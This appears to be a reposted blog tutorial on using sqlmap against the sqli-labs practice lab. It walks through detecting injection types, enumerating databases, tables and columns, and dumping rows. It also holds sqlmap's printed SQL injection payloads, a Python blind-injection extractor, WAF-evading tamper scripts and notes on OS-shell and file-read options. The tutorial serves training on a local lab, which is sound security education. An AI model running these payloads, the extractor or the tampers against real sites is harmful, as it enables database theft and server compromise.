Web Security Attack and Defense: Using sqlmap

The book Web安全攻防 (Web Security Attack and Defense) uses sqli-labs to introduce sqlmap, that great tool; I will also walk through the basic usage of the tool here.

The basic steps of a SQL injection:

  • Identify the injection type
  • Get the database names
  • Get the table names
  • Get the column names
  • Dump the data

1 Identify the injection type

1.1 GET type

Use the -u option to specify the URL (sqli-labs Less-1):

sqlmap -u "http://localhost:4000/Less-1?id=1"

Note: the URL should carry the request parameter(s) (here id=1); sqlmap only tests the parameters it finds in the request.

sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 9623=9623 AND 'JjhO'='JjhO


    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=1' AND GTID_SUBSET(CONCAT(0x71767a7871,(SELECT (ELT(3702=3702,1))),0x716a6b6271),3702) AND 'oyIr'='oyIr


    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8003 FROM (SELECT(SLEEP(5)))etaK) AND 'ACHt'='ACHt


    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-9510' UNION ALL SELECT NULL,CONCAT(0x71767a7871,0x65497456414974586b4c4a676479645971685666684c6163637353757955774841706b47726a6755,0x716a6b6271),NULL-- -
---

sqlmap found that the id parameter is injectable with four techniques (boolean-based blind, error-based, time-based blind and UNION query) and printed the payload it used for each one. sqlmap implements six injection techniques in total; they are selected with --technique, whose default is BEUSTQ, i.e. all of them:

  • U: UNION query
  • E: error-based
  • B: boolean-based blind
  • T: time-based blind
  • S: stacked queries
  • Q: inline queries

If you are not familiar with these injection types, work through sqli-labs first; see my earlier article: https://blog.csdn.net/qq_43085611/article/details/112661431.
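To make concrete what sqlmap does behind a boolean-based blind finding like the one above, and why the enumeration steps in sections 2 to 5 cost so many requests, here is an added example that is neither from the book nor from sqlmap itself. It builds a toy application with the same string-concatenated query shape as sqli-labs Less-1 (on SQLite rather than MySQL, so it runs offline), a boolean oracle using the same 1' AND (...) AND 'a'='a payload shape sqlmap printed, and an extractor that recovers a value one character at a time by bisecting its code point. The table contents, the class names and the hardened variant are my own construction.

```python
import sqlite3

# Constructed sample data, modelled on the sqli-labs 'security.emails' table
# dumped later in this article (values invented for this example).
SAMPLE_ROWS = [
    (1, "alice@example.test"),
    (2, "bob@example.test"),
    (3, "carol@example.test"),
]


class VulnerableApp:
    """Mimics sqli-labs Less-1: the id parameter is spliced straight into the query.
    sqli-labs runs on MySQL; SQLite is used here so the example runs offline."""

    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        self.conn.execute("CREATE TABLE emails (id INTEGER PRIMARY KEY, email_id TEXT)")
        self.conn.executemany("INSERT INTO emails VALUES (?, ?)", SAMPLE_ROWS)
        self.queries = 0  # counts requests, like sqlmap's "total of N HTTP(s) requests"

    def lookup(self, id_param):
        self.queries += 1
        sql = "SELECT email_id FROM emails WHERE id='%s' LIMIT 0,1" % id_param
        return self.conn.execute(sql).fetchone()


class HardenedApp(VulnerableApp):
    """Same query with a bound parameter: the whole payload is compared as one literal."""

    def lookup(self, id_param):
        self.queries += 1
        sql = "SELECT email_id FROM emails WHERE id=? LIMIT 0,1"
        return self.conn.execute(sql, (id_param,)).fetchone()


def oracle(app, condition):
    """Boolean oracle with the shape of sqlmap's payload
    id=1' AND 9623=9623 AND 'JjhO'='JjhO: a row comes back iff the condition holds."""
    return app.lookup("1' AND (%s) AND 'a'='a" % condition) is not None


def extract(app, expression, max_len=64):
    """Read the string value of an SQL expression one character at a time,
    bisecting each character's code point with 7 yes/no questions (0..127)."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # unicode(substr(...)) is NULL past the end of the string, so every probe
            # answers False there and lo stays 0: that is how the end is detected.
            probe = "unicode(substr((%s),%d,1)) > %d" % (expression, pos, mid)
            if oracle(app, probe):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    app = VulnerableApp()
    for expr in ("SELECT name FROM sqlite_master WHERE type='table'",  # like --tables
                 "SELECT email_id FROM emails WHERE id=2"):            # like --dump
        print("retrieved: %r (%d requests so far)" % (extract(app, expr), app.queries))
    print("hardened app yields: %r" % extract(HardenedApp(), "SELECT email_id FROM emails WHERE id=2"))
```

Each character costs seven requests and detecting the end of the value costs seven more, which is why sqlmap prefers UNION or error-based techniques when they are available and only falls back to blind ones. Against HardenedApp the same oracle never answers True, so extract() returns an empty string: the bound parameter turns the payload into a literal that matches no id.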

1.2 POST or GET type (from a captured request)

Capture the request with Burp Suite and save it to a local file, here 1.txt. (A locally hosted target is usually visited as localhost or 127.0.0.1, and browsers normally send requests to those addresses directly instead of through the configured proxy, so Burp sees nothing. Either add a hosts entry that maps another hostname to 127.0.0.1 and browse to that name, or configure the browser not to bypass the proxy for localhost.) In Burp, save the intercepted request with right-click → Copy to file or Save item; the file is the raw HTTP request, request line, headers and body included.

Then use -r to point sqlmap at the saved request (-r REQUESTFILE: Load HTTP request from a file):

sqlmap -r 1.txt

Because the file carries the whole request, this works for GET and POST parameters alike; sqlmap tests every parameter it finds in the request (query string and body by default, cookies and headers at higher --level values).

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 2269=2269 AND 'fYWA'='fYWA


    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=1' AND GTID_SUBSET(CONCAT(0x716b6a7671,(SELECT (ELT(8383=8383,1))),0x7176786a71),8383) AND 'THdq'='THdq


    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1253 FROM (SELECT(SLEEP(5)))PKdp) AND 'yWGz'='yWGz


    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8764' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7671,0x766e654f656c6f7779676842616d704f53567a74486b645956614a4b527578794d6f44544775644b,0x7176786a71)-- -

If you read sqlmap's messages carefully, you will see that it also tells you where the results have been stored:

[16:00:42] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.6
back-end DBMS: MySQL >= 5.6
[16:00:42] [INFO] fetched data logged to text files under '/Users/littlechieh6/.local/share/sqlmap/output/burpsuite.slug01sh.top'


[*] ending @ 16:00:42 /2021-01-26/

2 Get the database names

Command:

sqlmap -r 1.txt --dbs

Database information:

web application technology: PHP 7.4.6
back-end DBMS: MySQL >= 5.6
[16:05:51] [INFO] fetching database names
[16:05:51] [WARNING] reflective value(s) found and filtering out
[16:05:51] [INFO] retrieved: 'mysql'
[16:05:51] [INFO] retrieved: 'information_schema'
[16:05:51] [INFO] retrieved: 'performance_schema'
[16:05:51] [INFO] retrieved: 'sys'
[16:05:51] [INFO] retrieved: 'study'
[16:05:51] [INFO] retrieved: 'hello_ssm'
[16:05:51] [INFO] retrieved: 'dvwa'
[16:05:51] [INFO] retrieved: 'security'
[16:05:51] [INFO] retrieved: 'challenges'
available databases [9]:
[*] challenges
[*] dvwa
[*] hello_ssm
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] study
[*] sys

3 Get the table names

Command:

sqlmap -r 1.txt --tables

This lists the tables of every database on the server, which is rarely what you want.

The usual form names the database:

sqlmap -r 1.txt -D="security" --tables

-D selects the database whose tables you want. (sqlmap accepts both -D=security and -D security; the latter is the conventional form.) Output:

[16:09:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.6
back-end DBMS: MySQL >= 5.6
[16:09:23] [INFO] fetching tables for database: 'security'
[16:09:23] [WARNING] reflective value(s) found and filtering out
[16:09:23] [INFO] retrieved: 'emails'
[16:09:23] [INFO] retrieved: 'referers'
[16:09:23] [INFO] retrieved: 'uagents'
[16:09:23] [INFO] retrieved: 'users'
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

[16:09:23] [INFO] fetched data logged to text files under '/Users/littlechieh6/.local/share/sqlmap/output/burpsuite.slug01sh.top'

[*] ending @ 16:09:23 /2021-01-26/

4 Get the column names

As when listing tables, it is best to name the table you care about:

sqlmap -r 1.txt -D="security" -T emails --columns

Both argument styles appear in this command: -D="security" and -T emails. sqlmap accepts either -D=value or -D value (and likewise for -T and -C).

Output:

[16:13:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.6
back-end DBMS: MySQL >= 5.6
[16:13:59] [INFO] fetching columns for table 'emails' in database 'security'
[16:14:00] [WARNING] reflective value(s) found and filtering out
[16:14:00] [INFO] retrieved: 'id','int'
[16:14:00] [INFO] retrieved: 'email_id','varchar(30)'
Database: security
Table: emails
[2 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| email_id | varchar(30) |
| id       | int         |
+----------+-------------+


[16:14:00] [INFO] fetched data logged to text files under '/Users/littlechieh6/.local/share/sqlmap/output/burpsuite.slug01sh.top'


[*] ending @ 16:14:00 /2021-01-26/

5 Dump the data

Command:

sqlmap -r 1.txt -D "security" -T emails -C email_id,id --dump

Output:

[16:17:19] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.6
back-end DBMS: MySQL >= 5.6
[16:17:19] [INFO] fetching entries of column(s) 'email_id, id' for table 'emails' in database 'security'
[16:17:19] [WARNING] reflective value(s) found and filtering out
[16:17:19] [INFO] retrieved: '[email protected]','1'
[16:17:19] [INFO] retrieved: '[email protected]','2'
[16:17:19] [INFO] retrieved: '[email protected]','3'
[16:17:19] [INFO] retrieved: '[email protected]','4'
[16:17:19] [INFO] retrieved: '[email protected]','5'
[16:17:19] [INFO] retrieved: '[email protected]','6'
[16:17:19] [INFO] retrieved: '[email protected]','7'
[16:17:19] [INFO] retrieved: '[email protected]','8'
Database: security
Table: emails
[8 entries]
+------------------------+----+
| email_id               | id |
+------------------------+----+
| [email protected]       | 1  |
| [email protected]       | 2  |
| [email protected]    | 3  |
| [email protected]   | 4  |
| [email protected]   | 5  |
| [email protected] | 6  |
| [email protected]   | 7  |
| [email protected]      | 8  |
+------------------------+----+


[16:17:19] [INFO] table 'security.emails' dumped to CSV file '/Users/littlechieh6/.local/share/sqlmap/output/burpsuite.slug01sh.top/dump/security/emails.csv'
[16:17:19] [INFO] fetched data logged to text files under '/Users/littlechieh6/.local/share/sqlmap/output/burpsuite.slug01sh.top'


[*] ending @ 16:17:19 /2021-01-26/

The dumped rows are saved as a CSV file under the output directory shown above, one file per table (here dump/security/emails.csv).

6 Other options

Configuration

  • --level n: n from 1 to 5, the test level. Higher levels test more parameters and more payloads (level 2 adds Cookie values, level 3 adds the User-Agent and Referer headers) at the cost of more requests. Default 1.
  • --referer: set the HTTP Referer header, for applications that check it.
  • --sql-shell: interactive prompt for running your own SQL statements through the injection.
  • --os-cmd / --os-shell: run a single operating-system command, or open an interactive shell, on the database server (needs sufficient DBMS privileges; check --is-dba first).
  • --file-read: read a file from the database server's filesystem.
  • --file-write together with --file-dest: upload a local file (--file-write) to the given path on the server (--file-dest). --file-dest is the destination of --file-write, not an alternative to it.
  • --tamper script: apply tamper scripts to the payloads to get past WAF/IDS/IPS filtering (comma-separate several).

Enumeration

  • --users: database users
  • --passwords: the users' password hashes
  • --current-db: the current database name
  • --current-user: the current database user
  • --is-dba: whether the current user has DBA privileges
  • --roles: the users' roles (use --privileges for their privileges)

7 Tamper

Tamper scripts are mostly used to get past a WAF. Let's look at a simple one, base64encode:

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.convert import encodeBase64   # sqlmap's own helper around base64 encoding
from lib.core.enums import PRIORITY         # ordering constants for chained tamper scripts

# Low priority: an encoder must run after any tamper that reshapes the payload text
__priority__ = PRIORITY.LOW


def dependencies():
    # Hook for tampers that need a particular DBMS or extra modules; nothing required here
    pass


def tamper(payload, **kwargs):
    """
    Base64-encodes all characters in a given payload

    >>> tamper("1' AND SLEEP(5)#")
    'MScgQU5EIFNMRUVQKDUpIw=='
    """

    # Empty/None payloads pass through untouched; binary=False returns a str, not bytes
    return encodeBase64(payload, binary=False) if payload else payload

A tamper script transforms the payload once, just before it is sent. For example, some sites base64-encode a parameter on the client before sending it, and the server base64-decodes it on receipt. Without a tamper, sqlmap sends its payload in the clear; after the server's base64 decode it is garbage, so the injection can never succeed. With base64encode the server decodes it back into the intended SQL.

In practice you have to analyze how the site encodes the data it sends and write a tamper to match. Usage: --tamper module-name (the script's file name, e.g. --tamper=base64encode; several can be chained with commas).
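As an added example (not from the book and not one of sqlmap's bundled tamper scripts), here is a tamper written the way the paragraph above describes, for a hypothetical front end that sends the parameter as the base64 of the JSON object {"id": "<value>"}. The module name b64json and that wire format are assumptions. server_side_decode() models what such a back end would do with the parameter, purely so that the round trip can be checked; it is not part of a tamper script. The try/except around the PRIORITY import lets the module run outside sqlmap.

```python
#!/usr/bin/env python
"""Hypothetical custom tamper: JSON-wrap the payload as {"id": payload}, then base64.
Would be saved as tamper/b64json.py inside sqlmap and loaded with --tamper=b64json."""

import base64
import json

try:
    from lib.core.enums import PRIORITY  # present when sqlmap imports the module
except ImportError:
    # Running outside sqlmap (tests, doctest): mirror the constants in lib/core/enums.py
    class PRIORITY:
        LOWEST, LOWER, LOW, NORMAL, HIGH, HIGHER, HIGHEST = -100, -50, -10, 0, 10, 50, 100

# Encoders go last: any payload-shaping tamper (e.g. space2comment) must already be applied
__priority__ = PRIORITY.LOW


def dependencies():
    pass


def tamper(payload, **kwargs):
    """Transform the payload exactly as the (assumed) front end would before sending it.

    >>> tamper("1")
    'eyJpZCI6IjEifQ=='
    """
    if not payload:
        return payload
    wrapped = json.dumps({"id": payload}, separators=(",", ":"))
    return base64.b64encode(wrapped.encode("utf-8")).decode("ascii")


def server_side_decode(value):
    """Model of what the assumed back end does with the parameter before it reaches SQL.
    Only here to verify that the tamper round-trips; a real tamper would not carry it."""
    return json.loads(base64.b64decode(value).decode("utf-8"))["id"]
```

The check that matters is server_side_decode(tamper(p)) == p for payloads containing quotes, double quotes and comment markers: if the server cannot recover the exact SQL fragment, no technique will work. sqlmap also passes the outgoing request headers to tamper() as kwargs["headers"], so a tamper can add or change headers (for instance the Content-Type the front end uses) when the wire format requires it.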


Reposted from blog.csdn.net/qq_43085611/article/details/113188273